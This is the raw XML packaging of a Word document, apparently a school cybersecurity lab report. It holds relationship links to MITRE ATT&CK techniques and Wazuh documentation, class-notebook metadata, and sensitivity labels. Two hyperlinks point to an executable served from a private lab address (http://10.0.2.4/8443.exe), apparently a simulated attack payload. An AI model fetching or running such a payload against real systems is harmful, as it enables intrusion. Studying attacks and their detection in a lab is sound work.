Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.xml" Id="rId3"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://chat.openai.com/chat" TargetMode="External" Id="rId12"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="comments.xml" Id="rId17"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png" Id="rId25"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.2.4/8443.exe" TargetMode="External" Id="rId33"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1105/" TargetMode="External" Id="rId38"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpg" Id="rId46"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/" TargetMode="External" Id="rId59"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png" Id="rId67"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mitre-attack.github.io/attack-navigator/" TargetMode="External" Id="rId20"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/004/" TargetMode="External" Id="rId41"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png" Id="rId54"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png" Id="rId62"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1041/" TargetMode="External" Id="rId70"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml" Id="rId1"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" Id="rId6"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg" Id="rId15"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png" Id="rId23"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png" Id="rId28"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/001/" TargetMode="External" Id="rId36"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/005/" TargetMode="External" Id="rId49"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page" TargetMode="External" Id="rId57"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml" Id="rId10"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png" Id="rId31"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpg" Id="rId44"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/windows/win32/secauthz/access-control-lists" TargetMode="External" Id="rId52"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png" Id="rId60"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png" Id="rId65"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" Id="rId73"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item4.xml" Id="rId4"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml" Id="rId9"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpg" Id="rId13"/><Relationship Type="http://schemas.microsoft.com/office/2011/relationships/commentsExtended" Target="commentsExtended.xml" Id="rId18"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/003/" TargetMode="External" Id="rId39"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.2.4/8443.exe" TargetMode="External" Id="rId34"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documentation.wazuh.com/current/user-manual/capabilities/log-data-collection/how-it-works.html" TargetMode="External" Id="rId50"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/003/" TargetMode="External" Id="rId55"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" Id="rId7"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml" Id="rId71"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image18.png" Id="rId390838871"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image19.png" Id="rId811046634"/></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Invited_Members xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Invited_Students xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <FolderType xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <CultureName xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Students xmlns="7a55632c-71a9-4716-adec-04b70b797f1d">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Students>
    <Invited_Teachers xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Teachers xmlns="7a55632c-71a9-4716-adec-04b70b797f1d">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Teachers>
    <Student_Groups xmlns="7a55632c-71a9-4716-adec-04b70b797f1d">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Student_Groups>
    <Leaders xmlns="7a55632c-71a9-4716-adec-04b70b797f1d">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Leaders>
    <Self_Registration_Enabled xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Has_Leaders_Only_SectionGroup xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Templates xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Has_Teacher_Only_SectionGroup xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Member_Groups xmlns="7a55632c-71a9-4716-adec-04b70b797f1d">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Member_Groups>
    <DefaultSectionNames xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Is_Collaboration_Space_Locked xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <AppVersion xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <TeamsChannelId xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Invited_Leaders xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <NotebookType xmlns="7a55632c-71a9-4716-adec-04b70b797f1d" xsi:nil="true"/>
    <Members xmlns="7a55632c-71a9-4716-adec-04b70b797f1d">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Members>
    <Owner xmlns="7a55632c-71a9-4716-adec-04b70b797f1d">
      <UserInfo>
        <DisplayName/>
        <AccountId xsi:nil="true"/>
        <AccountType/>
      </UserInfo>
    </Owner>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B04D4DC1533AD47AA4EB046B15B04DA" ma:contentTypeVersion="33" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="170e704616000d6d706961324b301994">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="7a55632c-71a9-4716-adec-04b70b797f1d" xmlns:ns4="ca463da9-763a-4420-9236-b49999be4054" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="db0f141b54c6a3966325935e9c3119cc" ns3:_="" ns4:_="">
    <xsd:import namespace="7a55632c-71a9-4716-adec-04b70b797f1d"/>
    <xsd:import namespace="ca463da9-763a-4420-9236-b49999be405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msChannelId"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AutoTags" minOccurs="0"/>
                <xsd:element ref="ns3:MediaServiceDateTaken" minOccurs="0"/>
                <xsd:element ref="ns3:MediaServiceOCR" minOccurs="0"/>
                <xsd:element ref="ns3:Leaders" minOccurs="0"/>
                <xsd:element ref="ns3:Members" minOccurs="0"/>
                <xsd:element ref="ns3:Member_Groups" minOccurs="0"/>
                <xsd:element ref="ns3:Invited_Leaders" minOccurs="0"/>
                <xsd:element ref="ns3:Invited_Members" minOccurs="0"/>
                <xsd:element ref="ns3:Has_Leaders_Only_SectionGroup" minOccurs="0"/>
                <xsd:element ref="ns3:MediaServiceGenerationTime" minOccurs="0"/>
                <xsd:element ref="ns3:MediaServiceEventHashCode"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55632c-71a9-4716-adec-04b70b797f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msChannelId" ma:index="20" nillable="true" ma:displayName="Teams Channel Id" ma:internalName="TeamsChannelId">
      <xsd:simpleType>
        <xsd:restriction base="dms:Text"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="Teachers" ma:index="21"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2"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3"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4" nillable="true" ma:displayName="Invited Teachers" ma:internalName="Invited_Teachers">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="Invited_Students" ma:index="25" nillable="true" ma:displayName="Invited Students" ma:internalName="Invited_Students">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="Self_Registration_Enabled" ma:index="26" nillable="true" ma:displayName="Self Registration Enabled" ma:internalName="Self_Registration_Enabled">
      <xsd:simpleType>
        <xsd:restriction base="dms:Boolean"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="Has_Teacher_Only_SectionGroup" ma:index="27" nillable="true" ma:displayName="Has Teacher Only SectionGroup" ma:internalName="Has_Teacher_Only_SectionGroup">
      <xsd:simpleType>
        <xsd:restriction base="dms:Boolean"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="Is_Collaboration_Space_Locked" ma:index="28" nillable="true" ma:displayName="Is Collaboration Space Locked" ma:internalName="Is_Collaboration_Space_Locked">
      <xsd:simpleType>
        <xsd:restriction base="dms:Boolean"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="MediaServiceAutoTags" ma:index="29" nillable="true" ma:displayName="MediaServiceAutoTags" ma:internalName="MediaServiceAutoTags" ma:readOnly="true">
      <xsd:simpleType>
        <xsd:restriction base="dms:Text"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="MediaServiceDateTaken" ma:index="30" nillable="true" ma:displayName="MediaServiceDateTaken" ma:hidden="true" ma:internalName="MediaServiceDateTaken"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Leaders" ma:index="32"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33"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34"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35" nillable="true" ma:displayName="Invited Leaders" ma:internalName="Invited_Leaders">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="Invited_Members" ma:index="36" nillable="true" ma:displayName="Invited Members" ma:internalName="Invited_Members">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="Has_Leaders_Only_SectionGroup" ma:index="37" nillable="true" ma:displayName="Has Leaders Only SectionGroup" ma:internalName="Has_Leaders_Only_SectionGroup">
      <xsd:simpleType>
        <xsd:restriction base="dms:Boolean"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="MediaServiceGenerationTime" ma:index="38" nillable="true" ma:displayName="MediaServiceGenerationTime" ma:hidden="true" ma:internalName="MediaServiceGenerationTime" ma:readOnly="true">
      <xsd:simpleType>
        <xsd:restriction base="dms:Text"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="MediaServiceEventHashCode" ma:index="39" nillable="true" ma:displayName="MediaServiceEventHashCode" ma:hidden="true" ma:internalName="MediaServiceEventHashCode" ma:readOnly="true">
      <xsd:simpleType>
        <xsd:restriction base="dms:Text"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="MediaServiceLocation" ma:index="40"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463da9-763a-4420-9236-b49999be405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08B0287-37D4-4F86-836A-0A634F6B2ECE}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2F876FB6-3709-40F3-854F-D7520928AA92}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="7a55632c-71a9-4716-adec-04b70b797f1d"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B6C984CE-17FB-4115-92D3-599A1D9E0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55632c-71a9-4716-adec-04b70b797f1d"/>
    <ds:schemaRef ds:uri="ca463da9-763a-4420-9236-b49999be40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56CDEE-4434-4A28-BAC0-4FBCCA13C87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lastModifiedBy>Guest User</lastModifiedBy>
  <revision>975</revision>
  <lastPrinted>2026-02-05T03:39:00.0000000Z</lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-24T22:44:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-17T03:37:00.7575485Z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bcb20ed-001a-45f4-b2e7-234c5fc91178_Enabled">
    <vt:lpwstr>True</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_SiteId">
    <vt:lpwstr>25a99bf0-8e72-472a-ae50-adfbdf0df6f1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_Owner">
    <vt:lpwstr>edmund@TP.EDU.SG</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_SetDate">
    <vt:lpwstr>2019-12-10T06:25:35.1484006Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_Name">
    <vt:lpwstr>Official (Closed)</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_Application">
    <vt:lpwstr>Microsoft Azure Information Protection</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_ActionId">
    <vt:lpwstr>736b4a31-5e70-43c7-9b17-3880d3a905c8</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_4bcb20ed-001a-45f4-b2e7-234c5fc91178_Extended_MSFT_Method">
    <vt:lpwstr>Automatic</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_Enabled">
    <vt:lpwstr>True</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_SiteId">
    <vt:lpwstr>25a99bf0-8e72-472a-ae50-adfbdf0df6f1</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_Owner">
    <vt:lpwstr>edmund@TP.EDU.SG</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_SetDate">
    <vt:lpwstr>2019-12-10T06:25:35.1484006Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="14" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_Name">
    <vt:lpwstr>Non-Sensitive</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="15" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_Application">
    <vt:lpwstr>Microsoft Azure Information Protection</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="16" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_ActionId">
    <vt:lpwstr>736b4a31-5e70-43c7-9b17-3880d3a905c8</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="17" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_Parent">
    <vt:lpwstr>4bcb20ed-001a-45f4-b2e7-234c5fc91178</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="18" name="MSIP_Label_f69d7fc4-da81-42e5-b309-526f71322d86_Extended_MSFT_Method">
    <vt:lpwstr>Automatic</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="19" name="Sensitivity">
    <vt:lpwstr>Official (Closed) Non-Sensitive</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="20" name="ContentTypeId">
    <vt:lpwstr>0x0101002B04D4DC1533AD47AA4EB046B15B04DA</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="21" name="GrammarlyDocumentId">
    <vt:lpwstr>36a38360-7233-4825-8487-1fb8c2fb2d86</vt:lpwstr>
  </property>
</Properties>
</file>